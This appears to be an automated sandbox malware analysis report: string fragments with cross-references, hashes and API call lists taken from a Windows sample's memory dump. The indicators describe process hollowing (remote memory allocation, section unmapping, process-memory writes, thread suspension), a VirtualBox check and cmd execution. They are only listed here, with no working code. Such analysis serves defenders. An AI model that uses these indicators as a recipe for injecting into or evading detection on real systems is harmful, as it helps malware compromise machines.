x, xrefs: 00408D35
A, xrefs: 004066D0
s, xrefs: 004060F0
l, xrefs: 00405C74
p, xrefs: 00405E92
k, xrefs: 004061ED
n, xrefs: 00405E84
l, xrefs: 0040735F
p, xrefs: 00405E69
M, xrefs: 00407FB6
t, xrefs: 004067FC
r, xrefs: 004095F0
l, xrefs: 00406C8D
x, xrefs: 00408EC3
o, xrefs: 004067CC
S, xrefs: 0040662C
a, xrefs: 004086F1
x, xrefs: 004071CB
k, xrefs: 00406E25
i, xrefs: 00406853
z, xrefs: 00409BA8
a, xrefs: 00406476
p, xrefs: 0040615F
a, xrefs: 004069A8
p, xrefs: 00406EC5
a, xrefs: 00405D59
y, xrefs: 00406633
t, xrefs: 00405CD1
v, xrefs: 00408620
L, xrefs: 004073F1
r, xrefs: 00406411
P, xrefs: 00405B7E
i, xrefs: 00406D80
n, xrefs: 00406247
u, xrefs: 00405C6D
t, xrefs: 00406425
d, xrefs: 00405AD6
F, xrefs: 00406868
d, xrefs: 00406070
N, xrefs: 00406018
o, xrefs: 00407BBA
r, xrefs: 00407216
W, xrefs: 00406D44
i, xrefs: 00406FF2
o, xrefs: 00406BCE
S, xrefs: 004089EE
r, xrefs: 004060AC
c, xrefs: 00406E1E
i, xrefs: 00409664
A, xrefs: 00406AAB
h, xrefs: 0040726F
l, xrefs: 004064E9
5, xrefs: 004080C5
",1, xrefs: 0040977D
o, xrefs: 0040955B
psapi.dll, xrefs: 00407A3B, 00407A42
x, xrefs: 00409A8D
i, xrefs: 00406239
y, xrefs: 00406A74
y, xrefs: 004068F8
O, xrefs: 00409611
a, xrefs: 00405DBF
V, xrefs: 00406A7B
a, xrefs: 0040866C
\, xrefs: 00408F22
t, xrefs: 00405F15
2, xrefs: 00406011
I, xrefs: 004090BC
M, xrefs: 00407457
l, xrefs: 004067BE
s, xrefs: 00405F0E
z, xrefs: 00406540
d, xrefs: 00409BBB
l, xrefs: 004067D3
a, xrefs: 0040622B
, xrefs: 00409554
V, xrefs: 004069A1
i, xrefs: 004085FE
s, xrefs: 00408D58
W, xrefs: 00406693
c, xrefs: 00406188
s, xrefs: 00405F4C
C, xrefs: 004071A9
C, xrefs: 004064B3
l, xrefs: 00406498
', xrefs: 004092F6
a, xrefs: 00407327
VirtualAllocEx, xrefs: 00407930, 00407939
P, xrefs: 00405DD3
r, xrefs: 00408067
l, xrefs: 0040610B
/c , xrefs: 00409744
l, xrefs: 00406A15
W, xrefs: 00405D37
Program Fil, xrefs: 00407E73
n, xrefs: 00408705
l, xrefs: 00406861
F, xrefs: 00405C81
l, xrefs: 004062CB
o, xrefs: 004065F6
n, xrefs: 00407000
s, xrefs: 00407450
o, xrefs: 00405E47
D, xrefs: 00406655
W, xrefs: 00405E03
i, xrefs: 00406BAC
h, xrefs: 00405E55
Q, xrefs: 00406A59
s, xrefs: 00405DF5
o, xrefs: 00407435
m, xrefs: 004072AC
t, xrefs: 00409604
>, xrefs: 0040870C
ExitProc, xrefs: 0040775C, 00407765
t, xrefs: 0040678E
c, xrefs: 0040614A
m, xrefs: 004070D6
u, xrefs: 00406B04
r, xrefs: 00405D4C
C, xrefs: 0040640A
., xrefs: 00408F1E
Susp, xrefs: 00407997, 004079A0
m, xrefs: 00407BC8
F, xrefs: 00405EF9
t, xrefs: 00406510
W, xrefs: 00406767
a, xrefs: 0040685A
c, xrefs: 004070AE
x, xrefs: 00407D78
r, xrefs: 00406BB3
s, xrefs: 00409B23
r, xrefs: 00408EFD
C, xrefs: 004090AA
t, xrefs: 0040715E
s, xrefs: 00405DFC
r, xrefs: 0040688A
S, xrefs: 00409B5B
n, xrefs: 00406943
p, xrefs: 00406936
r, xrefs: 004064BA
>, xrefs: 0040864A
p, xrefs: 00407B98
a, xrefs: 00407283
h, xrefs: 00407B45
p, xrefs: 00409B4D
s, xrefs: 00405BC3
m, xrefs: 004073D5
., xrefs: 00405ACF
a, xrefs: 00406561
a, xrefs: 004095FD
s, xrefs: 00406B56
l, xrefs: 00406077
r, xrefs: 00405B85
m, xrefs: 0040664E
RuV, xrefs: 00407694, 0040769D
N, xrefs: 00405D1C
f, xrefs: 0040748E
d, xrefs: 0040728A
C, xrefs: 004095E9
t, xrefs: 0040714A
r, xrefs: 004070A0
r, xrefs: 00407472
t, xrefs: 004065EF
d, xrefs: 00407BDD
, xrefs: 004095C1
f, xrefs: 00406FD0
g, xrefs: 004084F5
s, xrefs: 00405AA0
a, xrefs: 00405E8B
t, xrefs: 00407420
o, xrefs: 00405CDF
O, xrefs: 00406FC9
t, xrefs: 00406C78
p, xrefs: 0040966B
s, xrefs: 0040619C
l, xrefs: 00405ADD
d, xrefs: 00405C66
i, xrefs: 004062BD
t, xrefs: 00406677
W, xrefs: 00409648
t, xrefs: 00407B4C
i, xrefs: 004062D2
l, xrefs: 00406F69
s, xrefs: 004085F7
A, xrefs: 00405B9A
W, xrefs: 0040696B
c, xrefs: 004086A1
n, xrefs: 00407487
r, xrefs: 0040621D
r, xrefs: 00408D1B
F, xrefs: 00406CD0
O, xrefs: 00406158
(, xrefs: 0040963A
x, xrefs: 0040644D
l, xrefs: 00406CDE
p, xrefs: 00407B5A
t, xrefs: 004071BE
y, xrefs: 00406AE8
t, xrefs: 00406097
i, xrefs: 00406CF2
C, xrefs: 0040609E
I, xrefs: 00407480
t, xrefs: 004065B9
a, xrefs: 00405CA3
u, xrefs: 004069B6
t, xrefs: 00406D6C
NtR, xrefs: 004079DC, 004079E8
n, xrefs: 0040725A
g, xrefs: 004069EC
l, xrefs: 00405E4E
P, xrefs: 00406ED9
., xrefs: 00408D2E
F, xrefs: 00405D01
s, xrefs: 00405D96
S, xrefs: 004065A4
l, xrefs: 00406135
s, xrefs: 00408537
c, xrefs: 004065E8
c, xrefs: 0040743C
c, xrefs: 00406EEE
r, xrefs: 00409599
l, xrefs: 004074D3
a, xrefs: 0040719B
r, xrefs: 00406AE1
u, xrefs: 00406A60
d, xrefs: 00405BF4
y, xrefs: 00406B6F
W, xrefs: 00406A37
t, xrefs: 004073B9
., xrefs: 00408872
l, xrefs: 00406C4B
S, xrefs: 00406FD7
d, xrefs: 004062F4
t, xrefs: 00406A00
a, xrefs: 00406120
n, xrefs: 0040860B
C, xrefs: 00405DAB
y, xrefs: 0040668C
M, xrefs: 00405C58
i, xrefs: 004086BC
p, xrefs: 0040683F
A, xrefs: 00405CB7
D, xrefs: 00409A62
t, xrefs: 00406440
C, xrefs: 00406B7D
\, xrefs: 00407B61
n, xrefs: 00407BD6
s, xrefs: 00407B68
f, xrefs: 004086B5
o, xrefs: 004071B0
D, xrefs: 004065CD
>, xrefs: 00408529
i, xrefs: 004062AF
n, xrefs: 004086AE
m, xrefs: 00408047
i, xrefs: 00405C88
x, xrefs: 004095D5
l, xrefs: 0040657D
s, xrefs: 00405D8F
4, xrefs: 00408627
myapp., xrefs: 00408F3A
l, xrefs: 00406876
i, xrefs: 00406576
x, xrefs: 00409BB4
i, xrefs: 00406CA1
s, xrefs: 0040810B
Writ, xrefs: 00407A5B, 00407A64
c, xrefs: 004072EA
N, xrefs: 0040800A
n, xrefs: 004072BA
M, xrefs: 00405CD8
o, xrefs: 00406B4F
r, xrefs: 00408035
C, xrefs: 00406462
u, xrefs: 00406439
l, xrefs: 00405D0F
n, xrefs: 004095C8
F, xrefs: 00406517
F, xrefs: 0040673E
f, xrefs: 0040620F
V, xrefs: 00407335
n, xrefs: 00406F5B
", xrefs: 004097AD
t, xrefs: 00406232
t, xrefs: 00405FD4
g, xrefs: 004068CA
E, xrefs: 004069C3
a, xrefs: 004067B7
n, xrefs: 004060C0
s, xrefs: 00406EFB
l, xrefs: 0040811D
x, xrefs: 0040812D
T, xrefs: 0040801C
p, xrefs: 004063C6
l, xrefs: 00405B1D
), xrefs: 004096A9
n, xrefs: 00406208
c, xrefs: 00406BC0
m, xrefs: 00407BC1
p, xrefs: 00406C5E
r, xrefs: 0040617A
g, xrefs: 004086C3
k, xrefs: 00405A29
o, xrefs: 00408EE9
2, xrefs: 00405A42
C, xrefs: 00405D45
t, xrefs: 00405D60
s, xrefs: 004072FE
r, xrefs: 0040957D
t, xrefs: 004095DC
h, xrefs: 00409687
<, xrefs: 00408651
h, xrefs: 00406803
c, xrefs: 00405B93
\SD_, xrefs: 00408A4D, 00408A59
t, xrefs: 0040689F
s, xrefs: 00406195
o, xrefs: 00407B91
c, xrefs: 00409BBF
S, xrefs: 004090B3
l, xrefs: 00405E62
", xrefs: 004096A2
L, xrefs: 004090CE
d, xrefs: 004073EA
i, xrefs: 004066EC
n, xrefs: 004084E0
m, xrefs: 004065C6
r, xrefs: 00406469
e, xrefs: 004085EA
r, xrefs: 004070E4
l, xrefs: 004066C3
, xrefs: 00409B3F
o, xrefs: 00407DF4
x, xrefs: 00406B18
u, xrefs: 00406AD4
l, xrefs: 00405A4E
n, xrefs: 004063D3
n, xrefs: 00406069
l, xrefs: 00407B83
A, xrefs: 0040612E
a, xrefs: 00408102
P, xrefs: 00405D6D
m, xrefs: 00405D2A
o, xrefs: 0040954D
t, xrefs: 00406E09
, xrefs: 00409B1C
A, xrefs: 00406454
x, xrefs: 00406906
t, xrefs: 0040602C
o, xrefs: 00406143
t, xrefs: 004064CE
o, xrefs: 00406E33
0, xrefs: 00408635
i, xrefs: 004065D4
\, xrefs: 00407B8A
A, xrefs: 0040690D
R, xrefs: 00406554
\, xrefs: 00407BAC
y, xrefs: 004065AB
r, xrefs: 00405F07
i, xrefs: 004064E2
o, xrefs: 0040713C
0, xrefs: 004080CE
n, xrefs: 004073E3
., xrefs: 00405B11
x, xrefs: 00406A30
W, xrefs: 004064F6
b, xrefs: 00409618
p, xrefs: 0040855D
F, xrefs: 00405FB8
T, xrefs: 00406E10
l, xrefs: 00405C8F
r, xrefs: 00409576
F, xrefs: 0040648A
t, xrefs: 00406625
_, xrefs: 004090D7
Q, xrefs: 00406ACD
d, xrefs: 00406F62
o, xrefs: 004070DD
M, xrefs: 00409B46
m, xrefs: 00406224
x, xrefs: 00406AA4
x, xrefs: 00406760
o, xrefs: 00406240
r, xrefs: 00407343
c, xrefs: 00407BB3
a, xrefs: 00405C15
i, xrefs: 00406E17
/, xrefs: 0040869A
EqualSid, xrefs: 00407803, 0040780C
r, xrefs: 0040718E
Sys, xrefs: 004088C8, 004088D4
T, xrefs: 00407208
c, xrefs: 004084D3
a, xrefs: 00406A0E
r, xrefs: 00405E18
t, xrefs: 00405F74
R, xrefs: 004068BD
l, xrefs: 00406525
P, xrefs: 00407099
t, xrefs: 00409633
a, xrefs: 00407223
c, xrefs: 00406FE4
c, xrefs: 00406670
a, xrefs: 00407358
a, xrefs: 004072C1
a, xrefs: 004062C4
m, xrefs: 00405CAA
r, xrefs: 00405FC6
y, xrefs: 00407479
u, xrefs: 004071F4
d, xrefs: 00405B15
r, xrefs: 00407FD1
", xrefs: 0040863C
7, xrefs: 004080E9
c, xrefs: 00409B69
y, xrefs: 004073A5
R, xrefs: 004069DF
t, xrefs: 004060C7
x, xrefs: 00408F11
s, xrefs: 004097F3
h, xrefs: 00409546
n, xrefs: 004061BE
r, xrefs: 0040739E
t, xrefs: 00405B77
M, xrefs: 00407366
y, xrefs: 00406BDC
O, xrefs: 00406EBE
t, xrefs: 00409B15
u, xrefs: 00405BFB
d, xrefs: 0040687D
N, xrefs: 00405F60
r, xrefs: 0040965D
l, xrefs: 00406127
n, xrefs: 004068E5
A, xrefs: 0040628C
s, xrefs: 004065B2
n, xrefs: 004073FF
n, xrefs: 00405C1C
i, xrefs: 00406491
", xrefs: 00409774
StcF, xrefs: 00407658, 00407664
t, xrefs: 004061D8
c, xrefs: 0040953F
d, xrefs: 00405BA8
S, xrefs: 00406532
a, xrefs: 004064C7
l, xrefs: 00406B48
T, xrefs: 004061A3
", xrefs: 00409641
t, xrefs: 004062B6
o, xrefs: 00406216
g, xrefs: 00406B3A
E, xrefs: 00408013
s, xrefs: 00407FE1
s, xrefs: 00406C2F
o, xrefs: 004070A7
a, xrefs: 00406B91
x, xrefs: 00406025
V, xrefs: 00406AEF
A, xrefs: 00405C37
O, xrefs: 004063BF
s, xrefs: 00406EA9
., xrefs: 004096B0
W, xrefs: 004068AD
E, xrefs: 004068FF
Dtl, xrefs: 0040774B, 00407754
x, xrefs: 00409937
T, xrefs: 00406C9A
i, xrefs: 00405D08
c, xrefs: 00409656
a, xrefs: 00408508
r, xrefs: 00406A6D
s, xrefs: 004095A6
l, xrefs: 0040674C
A, xrefs: 004063FC
i, xrefs: 004086FE
P, xrefs: 00408114
s, xrefs: 00409B54
S, xrefs: 004062E6
E, xrefs: 0040695D
D, xrefs: 004090C5
m, xrefs: 00407464
o, xrefs: 00406112
u, xrefs: 00406A90
u, xrefs: 00406E3A
5, xrefs: 004092E8
ntdll.dll, xrefs: 0040791C, 00407923
i, xrefs: 00408D23
W, xrefs: 0040740C
d, xrefs: 00405A4A
v, xrefs: 00408080
F, xrefs: 004074C5
a, xrefs: 0040803E
S, xrefs: 00405E7D
r, xrefs: 004060B3
t, xrefs: 00407105
P, xrefs: 004067EE
t, xrefs: 00405BDF
Mov, xrefs: 00407628, 00407631
t, xrefs: 0040647D
, xrefs: 00409592
o, xrefs: 004061AA
r, xrefs: 00406EE0
q, xrefs: 00409B98
w, xrefs: 00408057
d, xrefs: 004067DA
h, xrefs: 0040720F
P, xrefs: 00406173
x, xrefs: 00405F6D
r, xrefs: 00406685
a, xrefs: 00405D23
Sitbs, xrefs: 00407614, 0040761D
S, xrefs: 00406838
o, xrefs: 00405EA7
r, xrefs: 004072DC
o, xrefs: 00405E40
W, xrefs: 00406715
2, xrefs: 00405F59
c, xrefs: 0040962C
l, xrefs: 00405A52
", xrefs: 00407C73
t, xrefs: 004066D7
n, xrefs: 004096C5
Writ, xrefs: 00407947, 00407950
advapi, xrefs: 00407677, 0040767B
i, xrefs: 00408515
l, xrefs: 00407DED
Duplicat, xrefs: 00407A24, 00407A2D
r, xrefs: 00405DDA
c, xrefs: 00408D27
t, xrefs: 00406831
S, xrefs: 0040698D
x, xrefs: 00407157
p, xrefs: 004068D8
o, xrefs: 00405BED
i, xrefs: 004073F8
T, xrefs: 004061DF
., xrefs: 00405A46
t, xrefs: 00405DC6
d, xrefs: 0040712E
Sii, xrefs: 00407723, 0040772C
b, xrefs: 004066F3
l, xrefs: 00405AB4
A, xrefs: 0040660B
s, xrefs: 0040663A
d, xrefs: 0040629A
t, xrefs: 0040699A
StcF, xrefs: 00407639, 00407645
o, xrefs: 00409B31
RuV, xrefs: 004076AA, 004076B3
m, xrefs: 00406CA8
s, xrefs: 004072F7
<, xrefs: 0040856B
E, xrefs: 00406759
o, xrefs: 00405C5F
l, xrefs: 00405C02
s, xrefs: 00405BBC
a, xrefs: 00406F54
h, xrefs: 00405AA7
7, xrefs: 004080D7

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcReadSnapshotTerminateToolhelp32$CopyModuleModule32NameProcess32wcslenwcsstr
String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
API String ID: 4197412122-1627083277
Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0040A280 Relevance: 15.1, APIs: 10, Instructions: 105
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
GetWindowRect.USER32(?,?), ref: 0040A2F1

Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD

_ftol.MSVCRT ref: 0040A30F
6CF39B80.MFC42(?,?,00000000,?,00000000), ref: 0040A33D
GetWindowRect.USER32(?,?), ref: 0040A34B
6CEFE6C0.MFC42(?), ref: 0040A354

Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E

SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
6CF30E90.MFC42 ref: 0040A387
6CF37850.MFC42 ref: 0040A3A0

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: Rect$Copy$Window$MessageSend$F37850_ftol
String ID:
API String ID: 1818263392-0
Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405830 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040A1B0: 6CF30310.MFC42(00000066,0040B588,?,00000000,?,0040B588,000000FF,00405856,00000000), ref: 0040A1D4
Part of subcall function 0040A1B0: 6CEF50F0.MFC42(00000066,0040B588,?,00000000,?,0040B588), ref: 0040A1E7
Part of subcall function 0040A1B0: 6CEFF390.MFC42(00000080,0000000E,00000080,00000066,0040B588,?,00000000,?,0040B588), ref: 0040A1F8
Part of subcall function 0040A1B0: LoadIconA.USER32(00000000,00000080), ref: 0040A1FE

6CF309F0.MFC42 ref: 0040586C
6CF303E0.MFC42 ref: 00405880

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: F303F30310F309F390IconLoad
String ID:
API String ID: 63119970-0
Opcode ID: 2349e14d3e6c0b0174860053992b03f3d25faf680dbb552c679795bca3051f16
Instruction ID: 153d81c11514b1ea564d80a7333924dfc76de3118ee78e3df0b47c9266eed7c2
Opcode Fuzzy Hash: 2349e14d3e6c0b0174860053992b03f3d25faf680dbb552c679795bca3051f16
Instruction Fuzzy Hash: 74F082314547809BC360EF24C942B96B7E4FB48B24F508B2EE099936C0DF7C5809DB86

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2A2 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6CF04ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A440 Relevance: 42.2, APIs: 28, Instructions: 246
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsIconic.USER32(?), ref: 0040A464
6CF03130.MFC42 ref: 0040A47C
SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
GetClientRect.USER32(?,?), ref: 0040A4BE
DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
6CF030D0.MFC42 ref: 0040A503
6CF016C0.MFC42 ref: 0040A520
6CF37140.MFC42 ref: 0040A530
73A24C40.GDI32(?), ref: 0040A5A2
6CEFE720.MFC42(00000000), ref: 0040A5AD
LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
73A24C00.GDI32(?,?,?), ref: 0040A5DF
6CF376C0.MFC42(00000000), ref: 0040A5EA
GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
6CF38460.MFC42(00000000), ref: 0040A611
DPtoLP.GDI32(?,?,00000002), ref: 0040A622
6CF387D0.MFC42(?,?,?), ref: 0040A63B
GetWindowRect.USER32(?,?), ref: 0040A66B
6CEFE6C0.MFC42(?), ref: 0040A678

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: MetricsRectSystem$ClientDrawE720F016F030F03130F37140F376F38460F387IconIconicMessageModeSendWindow
String ID:
API String ID: 3990971271-0
Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00404A40 Relevance: 122.9, APIs: 35, Strings: 35, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyRect.USER32(?,004384C8), ref: 00404A56

Part of subcall function 004039C0: 6CF37080.MFC42(?), ref: 004039EF
Part of subcall function 004039C0: 6CF37160.MFC42 ref: 00403A26
Part of subcall function 004039C0: 6CEF2DD0.MFC42(?), ref: 00403AC5

CopyRect.USER32(?,004384C8), ref: 00404A7E

Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
Part of subcall function 004039C0: 6CF381F0.MFC42(?), ref: 00403B6C
Part of subcall function 004039C0: 6CF381F0.MFC42(?,?), ref: 00403B7C
